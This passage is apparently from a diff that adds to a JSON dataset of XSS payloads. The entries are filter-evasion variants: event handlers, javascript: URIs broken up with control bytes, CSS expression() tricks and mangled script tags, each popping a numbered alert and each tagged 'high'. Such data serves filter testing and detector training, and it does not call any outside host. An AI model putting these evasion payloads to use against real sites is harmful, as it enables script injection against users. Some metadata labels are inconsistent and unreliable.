{ + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<body onResize body onResize=\"javascript:javascript:alert(6836)\"></body onResize>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<object onError object onError=\"javascript:javascript:alert(5105)\"></object onError>", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<body onPopState body onPopState=\"javascript:javascript:alert(2612)\"></body onPopState>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<html onMouseMove html onMouseMove=\"javascript:javascript:alert(6275)\"></html onMouseMove>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<applet onreadystatechange applet onreadystatechange=\"javascript:javascript:alert(9760)\"></applet onreadystatechange>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<body onpagehide body onpagehide=\"javascript:javascript:alert(9591)\"></body onpagehide>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<svg onunload svg onunload=\"javascript:javascript:alert(4622)\"></svg onunload>", + "category": "xss", + "metadata": { + "type": "svg_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<applet onerror applet onerror=\"javascript:javascript:alert(6823)\"></applet onerror>", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<body onkeyup body onkeyup=\"javascript:javascript:alert(3112)\"></body onkeyup>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<body onunload body onunload=\"javascript:javascript:alert(1332)\"></body onunload>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<iframe onload iframe onload=\"javascript:javascript:alert(7934)\"></iframe onload>", + "category": "xss", + "metadata": { + "type": "iframe", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<body onload body onload=\"javascript:javascript:alert(8185)\"></body onload>", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<html onmouseover html onmouseover=\"javascript:javascript:alert(9408)\"></html onmouseover>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<object onbeforeload object onbeforeload=\"javascript:javascript:alert(1676)\"></object onbeforeload>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<body onbeforeunload body onbeforeunload=\"javascript:javascript:alert(8765)\"></body onbeforeunload>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<body onfocus body onfocus=\"javascript:javascript:alert(7430)\"></body onfocus>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<body onkeydown body onkeydown=\"javascript:javascript:alert(6333)\"></body onkeydown>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<iframe onbeforeload iframe onbeforeload=\"javascript:javascript:alert(8273)\"></iframe onbeforeload>", + "category": "xss", + "metadata": { + "type": "iframe", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<iframe src iframe src=\"javascript:javascript:alert(4353)\"></iframe src>", + "category": "xss", + "metadata": { + "type": "iframe", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<svg onload svg onload=\"javascript:javascript:alert(7609)\"></svg onload>", + "category": "xss", + "metadata": { + "type": "svg_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<html onmousemove html onmousemove=\"javascript:javascript:alert(2138)\"></html onmousemove>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<body onblur body onblur=\"javascript:javascript:alert(6861)\"></body onblur>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "\\x3Cscript>javascript:alert(4448)</script>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "'\"`><script>/* *\\x2Fjavascript:alert(8756)// */</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<script>javascript:alert(6063)</script\\x0D", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<script>javascript:alert(9285)</script\\x0A", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<script>javascript:alert(9764)</script\\x0B", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<script charset=\"\\x22>javascript:alert(0624)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<!--\\x3E<img src=xxx:x onerror=javascript:alert(8272)> -->", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "`\"'><img src='#\\x27 onerror=javascript:alert(9690)>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<a href=\"javascript\\x3Ajavascript:alert(1812)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "\"'`><p><svg><script>a='hello\\x27;javascript:alert(0017)//';</script></p>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<a href=\"javas\\x00cript:javascript:alert(3197)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<a href=\"javas\\x07cript:javascript:alert(8249)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<a href=\"javas\\x0Dcript:javascript:alert(5613)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<a href=\"javas\\x0Acript:javascript:alert(9124)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<a href=\"javas\\x08cript:javascript:alert(5377)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<a href=\"javas\\x02cript:javascript:alert(8130)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<a href=\"javas\\x03cript:javascript:alert(5062)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<a href=\"javas\\x04cript:javascript:alert(3471)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<a href=\"javas\\x01cript:javascript:alert(4927)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<a href=\"javas\\x05cript:javascript:alert(2170)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<a href=\"javas\\x0Bcript:javascript:alert(1505)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<a href=\"javas\\x09cript:javascript:alert(2104)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<a href=\"javas\\x06cript:javascript:alert(5943)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<a href=\"javas\\x0Ccript:javascript:alert(6872)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<script>/* *\\x2A/javascript:alert(5910)// */</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<script>/* *\\x00/javascript:alert(4590)// */</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<style></style\\x3E<img src=\"about:blank\" onerror=javascript:alert(2807)//></style>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<style></style\\x0D<img src=\"about:blank\" onerror=javascript:alert(1666)//></style>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<style></style\\x09<img src=\"about:blank\" onerror=javascript:alert(2679)//></style>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<style></style\\x20<img src=\"about:blank\" onerror=javascript:alert(1779)//></style>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<style></style\\x0A<img src=\"about:blank\" onerror=javascript:alert(5277)//></style>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "\"'`>ABC<div style=\"font-family:'foo'\\x7Dx:expression(javascript:alert(6153);/*';\">DEF", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "\"'`>ABC<div style=\"font-family:'foo'\\x3Bx:expression(javascript:alert(6966);/*';\">DEF", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<script>if(\"x\\\\xE1\\x96\\x89\".length==2) { javascript:alert(0670);}</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<script>if(\"x\\\\xE0\\xB9\\x92\".length==2) { javascript:alert(8897);}</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<script>if(\"x\\\\xEE\\xA9\\x93\".length==2) { javascript:alert(6267);}</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "'`\"><\\x3Cscript>javascript:alert(6149)</script>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "'`\"><\\x00script>javascript:alert(1031)</script>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "\"'`><\\x3Cimg src=xxx:x onerror=javascript:alert(0895)>", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "\"'`><\\x00img src=xxx:x onerror=javascript:alert(3148)>", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<script src=\"data:text/plain\\x2Cjavascript:alert(0149)\"></script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<script src=\"data:\\xD4\\x8F,javascript:alert(6875)\"></script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<script src=\"data:\\xE0\\xA4\\x98,javascript:alert(8943)\"></script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<script src=\"data:\\xCB\\x8F,javascript:alert(8810)\"></script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<script\\x20type=\"text/javascript\">javascript:alert(5176);</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<script\\x3Etype=\"text/javascript\">javascript:alert(2468);</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<script\\x0Dtype=\"text/javascript\">javascript:alert(4884);</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<script\\x09type=\"text/javascript\">javascript:alert(9200);</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<script\\x0Ctype=\"text/javascript\">javascript:alert(4348);</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<script\\x2Ftype=\"text/javascript\">javascript:alert(9278);</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<script\\x0Atype=\"text/javascript\">javascript:alert(1667);</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "ABC<div style=\"x\\x3Aexpression(javascript:alert(9334)\">DEF", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "ABC<div style=\"x:expression\\x5C(javascript:alert(2703)\">DEF", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "ABC<div style=\"x:expression\\x00(javascript:alert(7407)\">DEF", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "ABC<div style=\"x:exp\\x00ression(javascript:alert(0502)\">DEF", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "ABC<div style=\"x:exp\\x5Cression(javascript:alert(4188)\">DEF", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "ABC<div style=\"x:\\x0Aexpression(javascript:alert(5306)\">DEF", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "ABC<div style=\"x:\\x09expression(javascript:alert(0926)\">DEF", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "ABC<div style=\"x:\\xE3\\x80\\x80expression(javascript:alert(5896)\">DEF", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "ABC<div style=\"x:\\xE2\\x80\\x84expression(javascript:alert(3110)\">DEF", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "ABC<div style=\"x:\\xC2\\xA0expression(javascript:alert(4285)\">DEF", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "ABC<div style=\"x:\\xE2\\x80\\x80expression(javascript:alert(3542)\">DEF", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "ABC<div style=\"x:\\xE2\\x80\\x8Aexpression(javascript:alert(4543)\">DEF", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "ABC<div style=\"x:\\x0Dexpression(javascript:alert(4501)\">DEF", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "ABC<div style=\"x:\\x0Cexpression(javascript:alert(6599)\">DEF", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "ABC<div style=\"x:\\xE2\\x80\\x87expression(javascript:alert(1165)\">DEF", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "ABC<div style=\"x:\\xEF\\xBB\\xBFexpression(javascript:alert(4961)\">DEF", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "ABC<div style=\"x:\\x20expression(javascript:alert(5759)\">DEF", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "ABC<div style=\"x:\\xE2\\x80\\x88expression(javascript:alert(9348)\">DEF", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "ABC<div style=\"x:\\x00expression(javascript:alert(7628)\">DEF", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "ABC<div style=\"x:\\xE2\\x80\\x8Bexpression(javascript:alert(9040)\">DEF", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "ABC<div style=\"x:\\xE2\\x80\\x86expression(javascript:alert(8003)\">DEF", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "ABC<div style=\"x:\\xE2\\x80\\x85expression(javascript:alert(3844)\">DEF", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "ABC<div style=\"x:\\xE2\\x80\\x82expression(javascript:alert(3140)\">DEF", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "ABC<div style=\"x:\\x0Bexpression(javascript:alert(2169)\">DEF", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "ABC<div style=\"x:\\xE2\\x80\\x81expression(javascript:alert(4086)\">DEF", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "ABC<div style=\"x:\\xE2\\x80\\x83expression(javascript:alert(9910)\">DEF", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "ABC<div style=\"x:\\xE2\\x80\\x89expression(javascript:alert(4951)\">DEF", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<a href=\"\\x0Bjavascript:javascript:alert(6928)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<a href=\"\\x0Fjavascript:javascript:alert(2828)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<a href=\"\\xC2\\xA0javascript:javascript:alert(2762)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<a href=\"\\x05javascript:javascript:alert(8115)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<a href=\"\\xE1\\xA0\\x8Ejavascript:javascript:alert(0260)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<a href=\"\\x18javascript:javascript:alert(8404)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<a href=\"\\x11javascript:javascript:alert(2913)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<a href=\"\\xE2\\x80\\x88javascript:javascript:alert(6186)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<a href=\"\\xE2\\x80\\x89javascript:javascript:alert(7419)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<a href=\"\\xE2\\x80\\x80javascript:javascript:alert(7838)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<a href=\"\\x17javascript:javascript:alert(8204)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<a href=\"\\x03javascript:javascript:alert(4212)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<a href=\"\\x0Ejavascript:javascript:alert(1930)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<a href=\"\\x1Ajavascript:javascript:alert(5770)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<a href=\"\\x00javascript:javascript:alert(5992)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<a href=\"\\x10javascript:javascript:alert(7391)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<a href=\"\\xE2\\x80\\x82javascript:javascript:alert(8231)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<a href=\"\\x20javascript:javascript:alert(0743)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<a href=\"\\x13javascript:javascript:alert(0676)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<a href=\"\\x09javascript:javascript:alert(2567)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<a href=\"\\xE2\\x80\\x8Ajavascript:javascript:alert(3134)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<a href=\"\\x14javascript:javascript:alert(0155)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<a href=\"\\x19javascript:javascript:alert(4041)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<a href=\"\\xE2\\x80\\xAFjavascript:javascript:alert(2141)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<a href=\"\\x1Fjavascript:javascript:alert(3690)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<a href=\"\\xE2\\x80\\x81javascript:javascript:alert(8888)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<a href=\"\\x1Djavascript:javascript:alert(7241)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<a href=\"\\xE2\\x80\\x87javascript:javascript:alert(1969)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<a href=\"\\x07javascript:javascript:alert(5238)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<a href=\"\\xE1\\x9A\\x80javascript:javascript:alert(8293)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<a href=\"\\xE2\\x80\\x83javascript:javascript:alert(4112)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<a href=\"\\x04javascript:javascript:alert(3228)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<a href=\"\\x01javascript:javascript:alert(2777)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": 